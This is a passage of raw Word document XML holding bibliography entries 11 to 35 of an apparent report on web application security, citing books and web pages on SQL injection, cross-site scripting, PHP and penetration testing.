      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. Nystrom, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>SQL injection defenses</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. O’Reilly, 2007.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68767188" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>“MySQL SQL Injection Cheat Sheet | pentestmonkey.” [Online]. Available: http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet. [Accessed: 08-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE5DE7" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[13]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. Grossman, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>XSS attacks : cross-site scripting exploits and defense</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Syngress, 2007.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95252F" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[14]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">P. Hope and B. Walther, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Web security testing cookbook</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. O’Reilly Media, 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC053BD" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">P. Bisht and V. N. Venkatakrishnan, “XSS-GUARD: Precise Dynamic Prevention of Cross-Site Scripting Attacks,” in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Detection of Intrusions and Malware, and Vulnerability Assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>, Berlin, Heidelberg: Springer Berlin Heidelberg, 2008, pp. 23–43.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6659676E" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[16]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. Singh, B. Singh, and H. Joseph, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Vulnerability analysis and defense for the Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Springer, 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE1C4C6" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[17]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Flanagan, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>JavaScript : the definitive guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. O’Reilly, 2006.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646A34B" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[18]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. (Susan E. Young and D. Aitel, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>The hacker’s handbook : the strategy behind breaking into and defending networks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. CRC Press, 2004.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF33309" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">H. F. Tipton and M. Krause, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Information security management handbook</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Taylor &amp; Francis e-Library, 2006.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9C25A" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">C. (Chris R. . McNab, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Network security assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. O’Reilly Media, Inc, 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A1C79E" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[21]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. Salmon, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Applied Network Security.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Packt Publishing, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373D8D6" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[22]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Cherry, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Securing SQL server : protecting your database from attackers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Syngress, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E523474" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[23]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">T. Canavan, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Joomla! web security : secure your Joomla! website from common security threats with this easy-to-use guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Packt Pub, 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B30E27" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[24]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">B. Edmunds, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Securing PHP apps</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3290A3" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[25]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. E. Davis and J. A. (Jon A. Phillips, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Learning PHP and MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. O’Reilly, 2007.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E385F8" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[26]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">R. Nixon, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Learning PHP, MySQL, JavaScript, CSS &amp;amp; HTML5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63977A3F" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[27]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Gove, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Multicore application programming : for Windows, Linux, and Oracle Solaris</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Addison-Wesley, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4539A62B" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[28]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Stuttard and M. Pinto, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>The web application hacker’s handbook : finding and exploiting security flaws</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Wiley, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA88CF2" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[29]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. Pinto, S. Adair, B. Hartstein, M. Richard, and M. Hale Ligh, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Attack and Defend Computer Security Set.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Wiley, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10340B24" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[30]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">N. Dhanjani, B. Rios, and B. Hardin, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Hacking : the next generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. O’Reilly, 2009.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379C14C8" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[31]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>“Injection Prevention Cheat Sheet - OWASP.” [Online]. Available: https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet. [Accessed: 15-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6190A" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[32]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">R. C. Barnett, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Web Application Defender’s Cookbook : Battling Hackers and Protecting Users.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Wiley Pub., Inc, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258B936A" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[33]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">I. Ristic, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Modsecurity handbook</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. Feisty Duck, 2010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A309DE" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[34]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">C. Duffy, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Python : penetration testing for developers : unleash the power of Python scripting to execute effective and efficient penetration tests : a course in three modules.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE8AF9" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[35]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. LeBlanc and T. Messerschmidt, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Identity and data security for web development : best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E66015" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRPr="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00CC1C29">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
